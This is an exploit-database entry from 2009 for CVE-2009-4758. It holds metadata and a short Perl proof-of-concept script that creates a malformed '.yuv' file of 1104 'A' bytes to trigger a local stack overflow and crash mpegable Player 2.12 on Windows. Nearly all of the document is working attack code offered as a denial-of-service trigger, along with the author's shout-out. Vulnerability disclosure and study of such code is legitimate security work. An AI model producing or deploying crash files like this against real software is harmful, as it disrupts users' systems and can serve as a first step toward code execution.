mpegable Player 2.12 - '.yuv' Local Stack Overflow (PoC)

Author: GoLd_M
type: dos
platform: windows
port: 
date_added: 2009-04-28  
date_updated:   
verified: 1  
codes: OSVDB-63340;CVE-2009-4758  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 8568.pl  
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ### ###
# #  mpegable Player 2.12 (YUV File) Local Stack Overflow POC   # #
# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### # ##
my $chars= "A" x 1104;
my $file="goldm.yuv";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Thanx Tryag.Com";

# milw0rm.com [2009-04-29]